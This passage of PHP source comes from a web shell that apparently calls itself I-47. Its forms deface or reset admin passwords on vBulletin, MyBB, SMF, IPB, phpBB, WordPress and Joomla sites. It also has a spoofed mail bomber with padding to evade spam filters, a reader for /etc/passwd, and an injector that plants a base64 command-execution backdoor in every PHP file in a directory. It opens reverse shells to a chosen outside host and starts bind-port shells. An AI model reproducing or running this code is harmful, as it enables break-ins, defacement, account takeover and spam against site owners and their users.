2897. $dbpass = $_COOKIE["dbpass"];
2898. $dbname = $_POST['dbname'];
2899. $tablename = $_POST['tablename'];
2900.  
2901. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
2902. mysql_select_db($dbname);
2903.  
2904. $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
2905. $row = mysql_fetch_array($sql);
2906. $row = $row['COLUMN_NAME'];
2907. $rowid = $_POST[$row];
2908.  
2909. $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
2910. $num = mysql_num_rows( $pResult );
2911.  
2912. $rowcount = $num;
2913.  
2914. $pResultLen = mysql_list_fields( $dbname, $tablename );
2915.  
2916.  
2917.  
2918. for( $i = 0; $i < $num; $i++ )
2919. {
2920. $field = mysql_fetch_array( $pResult );
2921. $fieldname = $field["Field"];
2922. $arrdata = $_REQUEST[$fieldname];
2923.  
2924.  
2925. $str .= " " . $fieldname . " = '" . $arrdata . "'";
2926. $rowcount--;
2927. if($rowcount != 0)
2928. $str .= ",";
2929. }
2930.  
2931. $str = "update $tablename set" . $str . " where $row=$rowid";
2932. mysql_query($str);
2933. header("Location:$self?action=viewdata&dbname=$dbname&tablename=$tablename");
2934. }
2935. else if(isset($_GET['logoutdb']))
2936. {
2937. setcookie("dbserver",time() - 60*60);
2938. setcookie("dbuser",time() - 60*60);
2939. setcookie("dbpass",time() - 60*60);
2940. header("Location:$self?database");
2941. }
2942.  
2943. // Forum Manager
2944. else if(isset($_GET["forum"]))
2945. { ?>
2946. <center><table><tr><td><a href="<?php echo $self; ?>?forum&defaceforum"><font color="lime" size="4">| Forum Defacer |</font></a></td>
2947. <td><a href="<?php echo $self; ?>?forum&passwordchange"><font color="lime" size="4">| Forum Password Changer |</font></a></td>
2948. </tr></table></center><br>
2949. <?php
2950. if(isset($_GET["defaceforum"]))
2951. {
2952. ?>
2953. <center>
2954. <font color="#FF0000" size="4">Vbulletin Forum Index Changer</font>
2955. <form action="<?php echo $self; ?>" method = "POST">
2956. <table border = "1" width="50%" height="316" style="text-align: center" align="center">
2957. <tr>
2958. <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
2959. <p>
2960. Table Prefix : <input type="text" name="prefix" class="sbox"> (Optional)</td>
2961. </p>
2962. </tr>
2963. <tr>
2964. <td height="167" width="780"><p align="center">&nbsp;<textarea class="box" name="index" cols=53 rows=8>lol ! You Are Hacked !!!!</textarea><p align="center"><input type = "submit" class="but" value = "Hack VB" name="forumdeface"></td>
2965. </tr>
2966. </table>
2967. </form>
2968.  
2969. <font color="#FF0000" size="4">MyBB Forum Index Changer</font>
2970. <form action="<?php echo $self; ?>" method = "POST">
2971. <table border = "1" width="50%" height="316" style="text-align: center" align="center">
2972. <tr>
2973. <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
2974. <p>
2975. Table Prefix : <input type="text" name="prefix" value="mybb_" class="sbox"> (Optional)</td>
2976. </p>
2977. </td>
2978. </tr>
2979. <tr>
2980. <td height="167" width="780"><p align="center">&nbsp;<textarea class="box" name="index" cols=53 rows=8>lol ! You Are Hacked !!!!</textarea><p align="center"><input type = "submit" class="but" value = "Hack MyBB" name="forumdeface"></td>
2981. </tr>
2982. </table>
2983. </form>
2984.  
2985. <font color="#FF0000" size="4">SMF Forum Index Changer</font>
2986. <form action="<?php echo $self; ?>" method = "POST">
2987. <table border = "1" width="50%" height="316" style="text-align: center" align="center">
2988. <tr>
2989. <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
2990. <p>
2991. Table Prefix : <input type="text" name="prefix" value="smf_" class="sbox"> (Optional)</td>
2992. </p>
2993. </td>
2994. </tr>
2995. <tr>
2996. <td height="105" width="780"><p align="center"><b>Message&nbsp;:</b> <input class="box" type="text" name="index" size="20" value="lol ! You Are Hacked !!!!"></p><b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">&nbsp;<input type = "submit" class="but" value = "Hack SMF" name="forumdeface"></p></td>
2997.  
2998. </tr>
2999. </table>
3000. </form>
3001.  
3002. <font color="#FF0000" size="4">IPB Forum Index Changer</font>
3003. <form action="<?php echo $self; ?>" method = "POST">
3004. <table border = "1" width="50%" height="316" style="text-align: center" align="center">
3005. <tr>
3006. <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20"></td>
3007. </tr>
3008. <tr>
3009. <td height="167" width="780"><p align="center">&nbsp;<textarea class="box" name="index" cols=53 rows=8>lol ! You Are Hacked !!!!</textarea><p align="center"><input type = "submit" class="but" value = "Hack IPB" name="forumdeface"></td>
3010. </tr>
3011. </table>
3012. </form>
3013.  
3014. <font color="#FF0000" size="4">Wordpress Index Changer</font>
3015. <form action="<?php echo $self; ?>" method = "POST">
3016. <table border = "1" width="50%" height="316" style="text-align: center" align="center">
3017. <tr>
3018. <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3019. <p>
3020. Table Prefix : <input type="text" name="prefix" value="wp_" class="sbox"> (Optional)</td>
3021. </p>
3022. </td>
3023. </tr>
3024. <tr>
3025. <td height="105" width="780"><p align="center"><b>Message&nbsp;:</b> <input class="box" type="text" name="index" size="20" value="lol ! You Are Hacked !!!!"></p><b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">&nbsp;<input type = "submit" class="but" value = "Hack wordpress" name="forumdeface"></p></td>
3026.  
3027. </tr>
3028. </table>
3029. </form>
3030. </center>
3031. <?php
3032. }
3033. else if(isset($_GET["passwordchange"]))
3034. {
3035. echo "<center>";
3036. if(isset($_GET['changed']))
3037. { ?><font color="lime" size="3"><blink>Password Changed Successfully</blink></font><br><br><?php }
3038. else if(isset($_GET['cannotchange']))
3039. { ?><font color="#FF0000" size="3"><blink>Cannot Change Password</blink></font><br><br> <?php } ?>
3040.  
3041. <font color="#FF0000" size="4">Vbulletin Forum Password Changer</font>
3042. <form action="<?php echo $self; ?>" method = "POST">
3043. <input type="hidden" name="forums" value="vb">
3044. <table border = "1" width="50%" height="246" style="text-align: center" align="center">
3045. <tr>
3046. <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3047. <p>
3048. Table Prefix : <input type="text" name="prefix" class="sbox"> (Optional)</td>
3049. </p>
3050. </tr>
3051. <tr>
3052. <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3053. </tr>
3054. </table>
3055. </form>
3056.  
3057. <font color="#FF0000" size="4">MyBB Forum Password Changer</font>
3058. <form action="<?php echo $self; ?>" method = "POST" name="mybb">
3059. <input type="hidden" name="forums" value="mybb">
3060. <table border = "1" width="50%" height="246" style="text-align: center" align="center">
3061. <tr>
3062. <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3063. <p>
3064. Table Prefix : <input type="text" name="prefix" value="mybb_" class="sbox"> (Optional)</td>
3065. </p>
3066. </tr>
3067. <tr>
3068. <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3069. </tr>
3070. </table>
3071. </form>
3072.  
3073. <font color="#FF0000" size="4">SMF Forum Password Changer</font>
3074. <form action="<?php echo $self; ?>" method = "POST" name="smf">
3075. <input type="hidden" name="forums" value="smf">
3076. <table border = "1" width="50%" height="246" style="text-align: center" align="center">
3077. <tr>
3078. <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3079. <p>
3080. Table Prefix : <input type="text" name="prefix" value="smf_" class="sbox"> (Optional)</td>
3081. </p>
3082. </tr>
3083. <tr>
3084. <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3085. </tr>
3086. </table>
3087. </form>
3088.  
3089. <font color="#FF0000" size="4">Phpbb Forum Password Changer</font>
3090. <form action="<?php echo $self; ?>" method = "POST">
3091. <input type="hidden" name="forums" value="phpbb">
3092. <table border = "1" width="50%" height="246" style="text-align: center" align="center">
3093. <tr>
3094. <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3095. <p>
3096. Table Prefix : <input type="text" name="prefix" value="phpbb_" class="sbox"> (Optional)</td>
3097. </p>
3098. </tr>
3099. <tr>
3100. <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3101. </tr>
3102. </table>
3103. </form>
3104.  
3105. <font color="#FF0000" size="4">IPB Forum Password Changer</font>
3106. <form action="<?php echo $self; ?>" method = "POST" name="ipb">
3107. <input type="hidden" name="forums" value="ipb">
3108. <table border = "1" width="50%" height="246" style="text-align: center" align="center">
3109. <tr>
3110. <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3111. <p>
3112. Table Prefix : <input type="text" name="prefix" class="sbox"> (Optional)</td>
3113. </p>
3114. </tr>
3115. <tr>
3116. <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3117. </tr>
3118. </table>
3119. </form>
3120.  
3121. <a name="wordp" id="wordp">
3122. <font color="#FF0000" size="4">Wordpress Password Changer</font>
3123. <form action="<?php echo $self; ?>" method = "POST" name="wp">
3124. <input type="hidden" name="forums" value="wp">
3125. <a name="wordp" id="wordp">
3126. <table border = "1" width="50%" height="246" style="text-align: center" align="center">
3127. <tr>
3128. <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3129. <p>
3130. Table Prefix : <input type="text" name="prefix" value="wp_" class="sbox"> (Optional)</td>
3131. </p>
3132. </tr>
3133. <tr>
3134. <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1"></p><p><b>New Username :</b> <input class="sbox" type="text" name="uname" size="20" value="admin">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3135. </tr>
3136. </table>
3137. </form>
3138.  
3139. <div name="jooml" id="jooml">
3140. <font color="#FF0000" size="4">Joomla Password Changer</font>
3141. <form action="<?php echo $self; ?>" method = "POST">
3142. <input type="hidden" name="forums" value="joomla">
3143. <table border = "1" width="50%" height="246" style="text-align: center" align="center">
3144. <tr>
3145. <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
3146. <p>
3147. Table Prefix : <input type="text" name="prefix" value="jos_" class="sbox"> (Optional)</td>
3148. </p>
3149. </tr>
3150. <tr>
3151. <td height="70" width="780"><p align="center"><b>New Username :</b> <input class="sbox" type="text" name="uname" size="20" value="admin">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
3152. </tr>
3153. </table>
3154. </form>
3155. <?php
3156. if(isset($_GET['changed']))
3157. { ?><font color="lime" size="3"><blink>Password Changed Successfully</blink></font><br><br><?php }
3158. else if(isset($_GET['cannotchange']))
3159. { ?><font color="#FF0000" size="3"><blink>Cannot Change Password</blink></font><br><br> <?php } ?>
3160. </center>
3161. <?php
3162. }
3163. }
3164.  
3165.  
3166. // Mail
3167.  
3168. else if(isset($_GET['mailbomb']))
3169. { ?>
3170. <center><table><tr><td><a href="<?php echo $self; ?>?bomb&mailbomb"><font color="lime" size="4">| Mail Bomber |</font></a></td><td><a href="<?php echo $self; ?>?mail&mailbomb"><font color="lime" size="4">| Mass Mailer |</font></a></td></tr></table></center><br>
3171. <?php
3172. if(isset($_GET['bomb']))
3173. {
3174. if(
3175. isset($_GET['to']) &&
3176. isset($_GET['subject']) &&
3177. isset($_GET['message']) &&
3178. isset($_GET['times']) &&
3179. $_GET['to'] != '' &&
3180. $_GET['subject'] != '' &&
3181. $_GET['message'] != '' &&
3182. $_GET['times'] != ''
3183. )
3184. {
3185. $times = $_GET['times'];
3186. while($times--)
3187. {
3188. if(isset($_GET['padding']))
3189. {
3190. $fromPadd = rand(0,9999);
3191. $subjectPadd = " -- ID : ".rand(0,9999999);
3192. $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
3193.  
3194. }
3195. $from = "president$fromPadd@whitehouse.gov";
3196. if(!mail($_GET['to'],$_GET['subject'].$subjectPadd,$_GET['message'].$messagePadd,"From:".$from))
3197. {
3198. $error = 1;
3199. echo "<center><font color=red size=3><blink><blink>Some Error Occured!</blink></font></center>";
3200. break;
3201. }
3202. }
3203. if($error != 1)
3204. {
3205. echo "<center><font color=lime size=3><blink>Mail(s) Sent!</blink></font></center>";
3206. }
3207. }
3208. else
3209. {
3210. ?>
3211. <form method="GET">
3212. <input type="hidden" name="bomb" />
3213. <input type="hidden" name="mailbomb" />
3214. <table id="margins" style="width:100%;">
3215. <tr>
3216. <td style="width:30%;">
3217. To
3218. </td>
3219. <td>
3220. <input class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
3221. </td>
3222. </tr>
3223.  
3224. <tr>
3225. <td style="width:30%;">
3226. Subject
3227. </td>
3228. <td>
3229. <input type="text" class="box" name="subject" value="I-47 Here!" onFocus="if(this.value == 'I-47 Here!')this.value = '';" onBlur="if(this.value=='')this.value='I-47 Here!';" />
3230. </td>
3231. </tr>
3232. <tr>
3233. <td style="width:30%;">
3234. No. of Times
3235. </td>
3236. <td>
3237. <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
3238. </td>
3239. </tr>
3240.  
3241. <tr>
3242. <td style="width:30%;">
3243.  
3244. Pad your message (Less spam detection)
3245.  
3246. </td>
3247. <td>
3248.  
3249. <input type="checkbox" name="padding"/>
3250.  
3251. </td>
3252. </tr>
3253. <tr>
3254. <td colspan="2">
3255. <textarea name="message" cols="110" rows="10" class="box">Hello !! This is I-47!!</textarea>
3256. </td>
3257. </tr>
3258.  
3259.  
3260. <tr>
3261. <td rowspan="2">
3262. <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value=" Bomb! "/>
3263. </td>
3264. </tr>
3265. </table>
3266. </form>
3267. <?php
3268. }
3269. }
3270. //Mass Mailer
3271.  
3272. else if(isset($_GET['mail']))
3273. {
3274. if
3275. (isset($_GET['to']) && isset($_GET['from']) && isset($_GET['subject']) && isset($_GET['message']))
3276. {
3277. if(mail($_GET['to'],$_GET['subject'],$_GET['message'],"From:".$_GET['from']))
3278. {
3279. echo "<center><font color=lime size=3><blink>Mail Sent!</blink></font></center>";
3280. }
3281. else
3282. {
3283. echo "<center><font color=red size=3><blink>Some Error Occured!</blink></font></center>";
3284. }
3285. }
3286. else
3287. {
3288. ?>
3289. <div align="left">
3290. <form method="GET">
3291. <input type="hidden" name="mail" />
3292. <input type="hidden" name="mailbomb" />
3293. <table align="left" style="width:100%;">
3294. <tr>
3295. <td style="width:10%;">From</td>
3296. <td style="width:80%;" align="left"><input name="from" class="box" value="Hello@abcd.in" onFocus="if(this.value == 'president@whitehouse.gov')this.value = '';" onBlur="if(this.value=='')this.value='president@whitehouse.gov';"/></td>
3297. </tr>
3298.  
3299. <tr>
3300. <td style="width:20%;">To</td>
3301. <td style="width:80%;"><input class="box" class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/></td>
3302. </tr>
3303.  
3304. <tr>
3305. <td style="width:20%;">Subject</td>
3306. <td style="width:80%;"><input type="text" class="box" name="subject" value="I-47 Here!!" onFocus="if(this.value == 'I-47 Here!!')this.value = '';" onBlur="if(this.value=='')this.value='I-47 Here!!';" /></td>
3307. </tr>
3308.  
3309.  
3310. <tr>
3311. <td colspan="2">
3312. <textarea name="message" cols="110" rows="10" class="box">Hello !! This is I-47!!!</textarea>
3313. </td>
3314. </tr>
3315.  
3316.  
3317. <tr>
3318. <td rowspan="2">
3319. <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value=" Send! "/>
3320. </td>
3321. </tr>
3322. </table>
3323. </form></div>
3324. <?php
3325. }
3326. }
3327. }
3328.  
3329. // View Passwd file
3330.  
3331. else if(isset($_GET['passwd']))
3332. {
3333. $test='';
3334. $tempp= tempnam($test, "cx");
3335. $get = "/etc/passwd";
3336. if(copy("compress.zlib://".$get, $tempp))
3337. {
3338. $fopenzo = fopen($tempp, "r");
3339. $freadz = fread($fopenzo, filesize($tempp));
3340. fclose($fopenzo);
3341. $source = htmlspecialchars($freadz);
3342. echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
3343. unlink($tempp);
3344. }
3345. else
3346. {
3347. if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2']))
3348. {
3349. $temp = "";
3350. for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
3351. {
3352. $uid = @posix_getpwuid($_GET['val1']);
3353. if ($uid)
3354. $temp .= join(':',$uid)."\n";
3355. }
3356. echo '<br/>';
3357. paramexe('Users', $temp);
3358. }
3359. else
3360. {
3361. ?>
3362. <form>
3363. <input type="hidden" name="passwd">
3364. <table border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
3365. <tr>
3366. <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
3367. </tr>
3368. <tr>
3369. <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
3370. </tr>
3371. <tr>
3372. <td colspan="2" align="center"><input type="submit" value=" Go " class="but"></td>
3373. </tr>
3374. </table><br>
3375. </form>
3376. <?php
3377. }
3378. }
3379. }
3380.  
3381.  
3382. // Code Injector
3383.  
3384. else if(isset($_GET['injector']))
3385. {
3386. ?>
3387. <table id="margins" >
3388. <tr>
3389. <form method='POST'>
3390. <input type="hidden" name="injector"/>
3391. <tr>
3392. <td width="100" class="title">
3393. Directory
3394. </td>
3395. <td>
3396. <input class="box" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
3397. </td>
3398. </tr>
3399. <tr>
3400. <td class="title">
3401. Mode
3402. </td>
3403. <td>
3404. <select style="width: 400px;" name="mode" class="box">
3405. <option value="Apender">Apender</option>
3406. <option value="Overwriter">Overwriter</option>
3407. </select>
3408. </td>
3409. </tr>
3410. <tr>
3411. <td class="title">
3412. File Type
3413. </td>
3414. <td>
3415. <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
3416. </td>
3417. </tr>
3418. <tr>
3419. <td>Create A backdoor by injecting this code in every php file of current directory</td>
3420. </tr>
3421.  
3422. <tr>
3423. <td colspan="2">
3424. <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode("PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+"); ?></textarea>
3425. </td>
3426. </tr>
3427.  
3428.  
3429. <tr>
3430. <td rowspan="2">
3431. <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value="Inject "/>
3432. </td>
3433. </tr>
3434. </form>
3435. </table>
3436. <?php
3437. }
3438. // Connect
3439.  
3440. else if(isset($_GET['connect']))
3441. {
3442. if(isset($_POST['ip']) && isset($_POST['port']) && $_POST['ip'] != "" && $_POST['port'] != "" )
3443. {
3444.  
3445. $host = $_POST['ip'];
3446. $port = $_POST['port'];
3447. if($_POST["lang"] == "perl")
3448. {
3449. if(is_writable("."))
3450. {
3451. @$fh=fopen(getcwd()."/bc.pl",'w');
3452. @fwrite($fh,gzinflate(base64_decode($backconnect_perl)));
3453. @fclose($fh);
3454. echo "<font color='#FFFFFF' size=3>Attempting to connect...</font></br>";
3455. execmd("perl ".getcwd()."/bc.pl $host $port",$disable);
3456. if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></br>";
3457. }
3458. else
3459. {
3460. @$fh=fopen("/tmp/bc.pl","w");
3461. @fwrite($fh,gzinflate(base64_decode($backconnect_perl)));
3462. @fclose($fh);
3463. echo "<font color='#FFFFFF' size=3>Attempting to connect...</font></br>";
3464. execmd("perl /tmp/bc.pl $host $port",$disable);
3465. if(!@unlink("/tmp/bc.pl")) echo "<font color='#FF0000'><h2>Warning: Failed to delete reverse-connection program<</h2>/font></br>";
3466. }
3467. }
3468. else if($_POST["lang"] == "c")
3469. {
3470. if(is_writable("."))
3471. {
3472. $w_file=@fopen("backc","w") or err();
3473. if($w_file)
3474. {
3475. @fputs($w_file,@base64_decode($back_connect_c));
3476. @fclose($w_file);
3477. }
3478. chmod('backc', 0777);
3479. //$blah = ex("gcc back.c -o backc");
3480. $blah = execmd("./backc ".$host." ".$port." &");
3481. echo "<font color='#FFFFFF' size=3>Attempting to connect...</font></br>";
3482. $_POST['backcconnmsg']="Trying to connect to <b>".$host."</b> on port <b>".$port."</b>.";
3483. //if (file_exists("back.c")) { unlink("back.c"); }
3484. if (file_exists("backc"))
3485. {
3486. unlink("backc"); }
3487. }
3488. else
3489. {
3490. chmod('/tmp/backc', 0777);
3491. $w_file=@fopen("/tmp/backc","w") or err();
3492. if($w_file)
3493. {
3494. @fputs($w_file,@base64_decode($back_connect_c));
3495. @fclose($w_file);
3496. }
3497. //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
3498. $blah = execmd("./backc ".$host." ".$port." &");
3499. echo "<font color='#FFFFFF' size=3>Attempting to connect...</font></br>";
3500. $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
3501. //if (file_exists("back.c")) { unlink("back.c"); }
3502. if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); }
3503. }
3504. }
3505. else if($_POST["lang"] == "php")
3506. {
3507. echo "<font color='#FFFFFF' size=3>Attempting to connect...</font>";
3508. $ip = $_POST['ip'];
3509. $port=$_POST['port'];
3510. $sockfd=fsockopen($ip , $port , $errno, $errstr );
3511. if($errno != 0)
3512. {
3513. echo "<font color='red'><b>$errno</b> : $errstr</font>";
3514. }
3515. else if (!$sockfd)
3516. {
3517. $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
3518. }
3519. else
3520. {
3521. fputs ($sockfd ,"\n=================================================================\nCoded By Arjun\n=================================================================");
3522. $pwd = exec_all("pwd");
3523. $sysinfo = exec_all("uname -a");
3524. $id = exec_all("id");
3525. $len = 1337;
3526. fputs($sockfd ,$sysinfo . "\n" );
3527. fputs($sockfd ,$pwd . "\n" );
3528. fputs($sockfd ,$id ."\n\n" );
3529. fputs($sockfd ,$dateAndTime."\n\n" );
3530. while(!feof($sockfd))
3531. {
3532. $cmdPrompt ="(I47)[$]> ";
3533. fputs ($sockfd , $cmdPrompt );
3534. $command= fgets($sockfd, $len);
3535. fputs($sockfd , "\n" . exec_all($command) . "\n\n");
3536. }
3537. fclose($sockfd);
3538. }
3539. }
3540. }
3541. else if(isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang']))
3542. {
3543. $passwd = $_POST['passwd'];
3544. if($_POST['lang'] == 'c')
3545. {
3546. if(is_writable("."))
3547. {
3548. @$fh=fopen(getcwd()."/bp.c",'w');
3549. @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
3550. @fclose($fh);
3551. execmd("chmod ".getcwd()."/bp.c 0755");
3552. execmd("gcc -o ".getcwd()."/bp ".getcwd()."/bp.c");
3553. execmd("chmod ".getcwd()."/bp 0755");
3554. $out = execmd(getcwd()."/bp"." ".$_POST['port']." ". $passwd ." &");
3555. echo "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
3556. }
3557. else
3558. {
3559. @$fh=fopen("/tmp/bp.c","w");
3560. @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
3561. @fclose($fh);
3562. execmd("chmod /tmp/bp.c 0755");
3563. execmd("gcc -o /tmp/bp /tmp/bp.c");
3564. $out = execmd("/tmp/bp"." ".$_POST['port']." ". $passwd ." &");
3565. echo "<pre>$out\n".execmd("ps aux | grep bp")."</pre>";
3566. }
3567. }
3568. if($_POST['lang'] == 'perl')
3569. {
3570. if(is_writable("."))
3571. {
3572. @$fh=fopen(getcwd()."/bp.pl",'w');
3573. @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
3574. @fclose($fh);
3575. execmd("chmod ".getcwd()."/bp.pl 0755");
3576. $out = execmd("perl ".getcwd()."/bp.pl" . " " . $passwd ." &");
3577. echo "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
3578. }
3579. else
3580. {
3581. @$fh=fopen("/tmp/bp.pl","w");
3582. @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
3583. @fclose($fh);
3584. $out = execmd("perl /tmp/bp.pl ". $passwd ." &");
3585. echo "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
3586. }
3587. }
3588. }
3589. else
3590. {
3591. ?>
3592. <table style="width:50%" align="center" >
3593. <tr>
